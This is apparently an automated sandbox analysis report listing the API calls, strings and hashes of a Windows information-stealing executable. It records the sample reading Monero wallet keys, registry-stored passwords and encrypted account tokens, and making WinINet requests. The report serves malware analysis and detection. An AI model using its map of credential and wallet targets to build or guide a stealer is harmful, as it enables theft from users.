                          • Part of subcall function 006D9AC0: LocalFree.KERNEL32(?,?,?,?,006D4EEE,00000000,?), ref: 006D9B3F
                        • lstrcat.KERNEL32(?,00000000), ref: 006E44A3
                        • StrCmpCA.SHLWAPI(?,006F08D1), ref: 006E44C0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 006E44D2
                        • lstrcat.KERNEL32(00000000,?), ref: 006E44E5
                        • lstrcat.KERNEL32(00000000,006F0FB8), ref: 006E44F4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                        • String ID: 8
                        • API String ID: 3541710228-3897458245
                        • Opcode ID: b2008e7caf9c2b6bd1529388c7f7f2b43645383cd4554585e83de6139ac7af3f
                        • Instruction ID: 784946509632c3c12df3dc433973cf264494647f9fc092aca594bb873a9ec510
                        • Opcode Fuzzy Hash: b2008e7caf9c2b6bd1529388c7f7f2b43645383cd4554585e83de6139ac7af3f
                        • Instruction Fuzzy Hash: 427157B6D11208ABDB54EBF0DC85FEE737AAB48300F00859CF60597181EA74DB45CBA5
                        APIs
                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 006E906C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateGlobalStream
                        • String ID: image/jpeg
                        • API String ID: 2244384528-3785015651
                        • Opcode ID: c282363f66107a060bfbe554be02330b1a1400976b95b3e8c3835960edd8dfbb
                        • Instruction ID: 953a5bf0164ba51f06886a861845a341d6666f3ef9f6881cd642a8f5b64180a7
                        • Opcode Fuzzy Hash: c282363f66107a060bfbe554be02330b1a1400976b95b3e8c3835960edd8dfbb
                        • Instruction Fuzzy Hash: 3D71EAB5A11208ABDB04DFE4DC89FEEB7B9BF48300F108508F615A7294DB74AA05DB61
                        APIs
                          • Part of subcall function 006EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006EA7E6
                          • Part of subcall function 006D6280: InternetOpenA.WININET(006F0DFE,00000001,00000000,00000000,00000000), ref: 006D62E1
                          • Part of subcall function 006D6280: StrCmpCA.SHLWAPI(?,00E4EAE8), ref: 006D6303
                          • Part of subcall function 006D6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 006D6335
                          • Part of subcall function 006D6280: HttpOpenRequestA.WININET(00000000,GET,?,00E4E248,00000000,00000000,00400100,00000000), ref: 006D6385
                          • Part of subcall function 006D6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006D63BF
                          • Part of subcall function 006D6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006D63D1
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006E5318
                        • lstrlen.KERNEL32(00000000), ref: 006E532F
                          • Part of subcall function 006E8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 006E8E52
                        • StrStrA.SHLWAPI(00000000,00000000), ref: 006E5364
                        • lstrlen.KERNEL32(00000000), ref: 006E5383
                        • lstrlen.KERNEL32(00000000), ref: 006E53AE
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 3240024479-1526165396
                        • Opcode ID: 12c3526e5ec6f53a2cf4160f0bb15f6ae98a94e0250f3a7dbe7f394e9ae0579d
                        • Instruction ID: 1fdc06e5a780c6105435f7b3ff527fdf1ceacbc400084b576d40174bbb925559
                        • Opcode Fuzzy Hash: 12c3526e5ec6f53a2cf4160f0bb15f6ae98a94e0250f3a7dbe7f394e9ae0579d
                        • Instruction Fuzzy Hash: 0F512E70912288ABDB54FFA1C992AFE377BAF10304F51401CF8065A192EF347B46CB66
                        APIs
                          • Part of subcall function 006EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006EA7E6
                          • Part of subcall function 006D47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 006D4839
                          • Part of subcall function 006D47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 006D4849
                        • InternetOpenA.WININET(006F0DF7,00000001,00000000,00000000,00000000), ref: 006D610F
                        • StrCmpCA.SHLWAPI(?,00E4EAE8), ref: 006D6147
                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 006D618F
                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 006D61B3
                        • InternetReadFile.WININET(?,?,00000400,?), ref: 006D61DC
                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 006D620A
                        • CloseHandle.KERNEL32(?,?,00000400), ref: 006D6249
                        • InternetCloseHandle.WININET(?), ref: 006D6253
                        • InternetCloseHandle.WININET(00000000), ref: 006D6260
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                        • String ID:
                        • API String ID: 2507841554-2740779761
                        • Opcode ID: 13d79e899923d907bcaf511f5694b9a1d4432cef80735fd761be86069b75e409
                        • Instruction ID: 49092855b1f681f66b5d7300f2f71febe6493b38925abcfe6c701c605ff40180
                        • Opcode Fuzzy Hash: 13d79e899923d907bcaf511f5694b9a1d4432cef80735fd761be86069b75e409
                        • Instruction Fuzzy Hash: C8515BB1E11208ABDB20DBA0DC45BEE77BAAB44701F108099F605A72C1DB746F85CF95
                        APIs
                          • Part of subcall function 006D12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006D12B4
                          • Part of subcall function 006D12A0: RtlAllocateHeap.NTDLL(00000000), ref: 006D12BB
                          • Part of subcall function 006D12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006D12D7
                          • Part of subcall function 006D12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006D12F5
                          • Part of subcall function 006D12A0: RegCloseKey.ADVAPI32(?), ref: 006D12FF
                        • lstrcat.KERNEL32(?,00000000), ref: 006D134F
                        • lstrlen.KERNEL32(?), ref: 006D135C
                        • lstrcat.KERNEL32(?,.keys), ref: 006D1377
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                          • Part of subcall function 006E8B60: GetSystemTime.KERNEL32(006F0E1A,00E4A900,006F05AE,?,?,006D13F9,?,0000001A,006F0E1A,00000000,?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006E8B86
                          • Part of subcall function 006EA920: lstrcpy.KERNEL32(00000000,?), ref: 006EA972
                          • Part of subcall function 006EA920: lstrcat.KERNEL32(00000000), ref: 006EA982
                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 006D1465
                          • Part of subcall function 006EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006EA7E6
                          • Part of subcall function 006D99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006D99EC
                          • Part of subcall function 006D99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 006D9A11
                          • Part of subcall function 006D99C0: LocalAlloc.KERNEL32(00000040,?), ref: 006D9A31
                          • Part of subcall function 006D99C0: ReadFile.KERNEL32(000000FF,?,00000000,006D148F,00000000), ref: 006D9A5A
                          • Part of subcall function 006D99C0: LocalFree.KERNEL32(006D148F), ref: 006D9A90
                          • Part of subcall function 006D99C0: CloseHandle.KERNEL32(000000FF), ref: 006D9A9A
                        • DeleteFileA.KERNEL32(00000000), ref: 006D14EF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                        • API String ID: 3478931302-218353709
                        • Opcode ID: aae9c854cd7af6929f1602be60cbf2c5f1ca53c17976d484b60163ed613b8e65
                        • Instruction ID: 1c44d07bfdc880669d9bb7c6d9292caaf1b72f2b72446bacb14c80bc0ccfb296
                        • Opcode Fuzzy Hash: aae9c854cd7af6929f1602be60cbf2c5f1ca53c17976d484b60163ed613b8e65
                        • Instruction Fuzzy Hash: EF5157B1D5125857DB55EBA1DC92BEE733E9F50300F41419CB60A62082EE706F85CBAA
                        APIs
                          • Part of subcall function 006D72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 006D733A
                          • Part of subcall function 006D72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006D73B1
                          • Part of subcall function 006D72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 006D740D
                          • Part of subcall function 006D72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 006D7452
                          • Part of subcall function 006D72D0: HeapFree.KERNEL32(00000000), ref: 006D7459
                        • lstrcat.KERNEL32(00000000,006F17FC), ref: 006D7606
                        • lstrcat.KERNEL32(00000000,00000000), ref: 006D7648
                        • lstrcat.KERNEL32(00000000, : ), ref: 006D765A
                        • lstrcat.KERNEL32(00000000,00000000), ref: 006D768F
                        • lstrcat.KERNEL32(00000000,006F1804), ref: 006D76A0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 006D76D3
                        • lstrcat.KERNEL32(00000000,006F1808), ref: 006D76ED
                        • task.LIBCPMTD ref: 006D76FB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                        • String ID: :
                        • API String ID: 2677904052-3653984579
                        • Opcode ID: ba50a78ba9b5107bb5f52efdccf1475db8d65903049288b18cf4f032b90c2119
                        • Instruction ID: b9e440ae5db33544dc330d08259017a2091a6b99d40d585e45d8f3aaea58d538
                        • Opcode Fuzzy Hash: ba50a78ba9b5107bb5f52efdccf1475db8d65903049288b18cf4f032b90c2119
                        • Instruction Fuzzy Hash: 58317CB5E1610ADFCB44EBE4DC89DFE737ABB48301B108019F102A7290EA34AD46DB56
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00E4E4A0,00000000,?,006F0E2C,00000000,?,00000000), ref: 006E8130
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006E8137
                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 006E8158
                        • __aulldiv.LIBCMT ref: 006E8172
                        • __aulldiv.LIBCMT ref: 006E8180
                        • wsprintfA.USER32 ref: 006E81AC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                        • String ID: %d MB$@
                        • API String ID: 2774356765-3474575989
                        • Opcode ID: ae09cb4dd437b36bb59bbb544841fcd725205c2b863e7d2ba82ddee6ed985482
                        • Instruction ID: f99800b8c83349efa969fe6d5d41bc499ed66600bd06ebd88937223162e69010
                        • Opcode Fuzzy Hash: ae09cb4dd437b36bb59bbb544841fcd725205c2b863e7d2ba82ddee6ed985482
                        • Instruction Fuzzy Hash: 122138B1E45348ABDB00DFD9CC49FAEB7B9FB44B10F104219F605BB280D77869018BA9
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 006D733A
                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006D73B1
                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 006D740D
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 006D7452
                        • HeapFree.KERNEL32(00000000), ref: 006D7459
                        • task.LIBCPMTD ref: 006D7555
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$EnumFreeOpenProcessValuetask
                        • String ID: Password
                        • API String ID: 775622407-3434357891
                        • Opcode ID: fefcbba48f9abdcd2a46e1d3c042c3336a03969cf077ddc19c5d9a662940f621
                        • Instruction ID: ea0e6c826d52b5bc60c6d1cfd62eea3e0139fa8ce4e1b50f842529d24cd1b0b9
                        • Opcode Fuzzy Hash: fefcbba48f9abdcd2a46e1d3c042c3336a03969cf077ddc19c5d9a662940f621
                        • Instruction Fuzzy Hash: 8F612CB5D1416C9BDB24DB50CC45BD9B7B9BF48300F0081EAE649A6241EB706FC9CFA5
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006E76A4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006E76AB
                        • RegOpenKeyExA.ADVAPI32(80000002,00E3C128,00000000,00020119,00000000), ref: 006E76DD
                        • RegQueryValueExA.ADVAPI32(00000000,00E4E4E8,00000000,00000000,?,000000FF), ref: 006E76FE
                        • RegCloseKey.ADVAPI32(00000000), ref: 006E7708
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: Windows 11$
                        • API String ID: 3225020163-442948342
                        • Opcode ID: 6bbe9308d8b150fe0dce18417cb0338c077ad4ad46b62d4c9a11a5a152cf1a53
                        • Instruction ID: bca55ce39565abff2353497772b3e4ad531d0cbda8c8c94ee736cd67071464e4
                        • Opcode Fuzzy Hash: 6bbe9308d8b150fe0dce18417cb0338c077ad4ad46b62d4c9a11a5a152cf1a53
                        • Instruction Fuzzy Hash: CF014FB5B19308BBEB00DBE5DC49FF9B7B9EB48701F108094FA0497291E6749E05DB51
                        APIs
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA920: lstrcpy.KERNEL32(00000000,?), ref: 006EA972
                          • Part of subcall function 006EA920: lstrcat.KERNEL32(00000000), ref: 006EA982
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                          • Part of subcall function 006EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006EA7E6
                        • lstrlen.KERNEL32(00000000), ref: 006DBC9F
                          • Part of subcall function 006E8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 006E8E52
                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 006DBCCD
                        • lstrlen.KERNEL32(00000000), ref: 006DBDA5
                        • lstrlen.KERNEL32(00000000), ref: 006DBDB9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                        • API String ID: 3073930149-1079375795
                        • Opcode ID: 211137146d0beecaaa93967c90247b9cb7d55e7e9fc7a5ceeb78d94556deee32
                        • Instruction ID: 0dddff7aea84648cb2f60b389d53ccc017e6e9b8d2a746484b21e2d978138c54
                        • Opcode Fuzzy Hash: 211137146d0beecaaa93967c90247b9cb7d55e7e9fc7a5ceeb78d94556deee32
                        • Instruction Fuzzy Hash: EBB162719122489BDB44EBE1DC96EEE733BAF14300F41412DF506A6192EF347E49CB6A
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess$DefaultLangUser
                        • String ID: *
                        • API String ID: 1494266314-163128923
                        • Opcode ID: 9c3423c5177b16c9f447f81c9408712e6f29e87e6188638b6c602db122e66c39
                        • Instruction ID: 8581fabe0e4205bfdd44749d89a4d5e7e4ead9b765ff4f3d321cad4ca896c1e1
                        • Opcode Fuzzy Hash: 9c3423c5177b16c9f447f81c9408712e6f29e87e6188638b6c602db122e66c39
                        • Instruction Fuzzy Hash: 5BF03A30E1A249EFE7449FE0E9097AC7B70FB05712F148198F609862D0D6704F41EB96
                        APIs
                        • lstrcat.KERNEL32(?,00E4E038), ref: 006E47DB
                          • Part of subcall function 006E8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006E8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 006E4801
                        • lstrcat.KERNEL32(?,?), ref: 006E4820
                        • lstrcat.KERNEL32(?,?), ref: 006E4834
                        • lstrcat.KERNEL32(?,00E3B860), ref: 006E4847
                        • lstrcat.KERNEL32(?,?), ref: 006E485B
                        • lstrcat.KERNEL32(?,00E4DA40), ref: 006E486F
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006E8D90: GetFileAttributesA.KERNEL32(00000000,?,006D1B54,?,?,006F564C,?,?,006F0E1F), ref: 006E8D9F
                          • Part of subcall function 006E4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 006E4580
                          • Part of subcall function 006E4570: RtlAllocateHeap.NTDLL(00000000), ref: 006E4587
                          • Part of subcall function 006E4570: wsprintfA.USER32 ref: 006E45A6
                          • Part of subcall function 006E4570: FindFirstFileA.KERNEL32(?,?), ref: 006E45BD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                        • String ID: 8
                        • API String ID: 2540262943-3897458245
                        • Opcode ID: 88825a515cc5c4c75ca86adb2dd51f0fe8a5a412b6a39a18f754ef4467b17685
                        • Instruction ID: ccff97d719a0005e69368b067cdef082fe5021ced1fb957ee983e079ba250654
                        • Opcode Fuzzy Hash: 88825a515cc5c4c75ca86adb2dd51f0fe8a5a412b6a39a18f754ef4467b17685
                        • Instruction Fuzzy Hash: BB3153B6D113086BCB50FBB0DC85EE9737DAB58700F40458DB31996082EE74AB89CB99
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 006D4FCA
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006D4FD1
                        • InternetOpenA.WININET(006F0DDF,00000000,00000000,00000000,00000000), ref: 006D4FEA
                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 006D5011
                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 006D5041
                        • InternetCloseHandle.WININET(?), ref: 006D50B9
                        • InternetCloseHandle.WININET(?), ref: 006D50C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
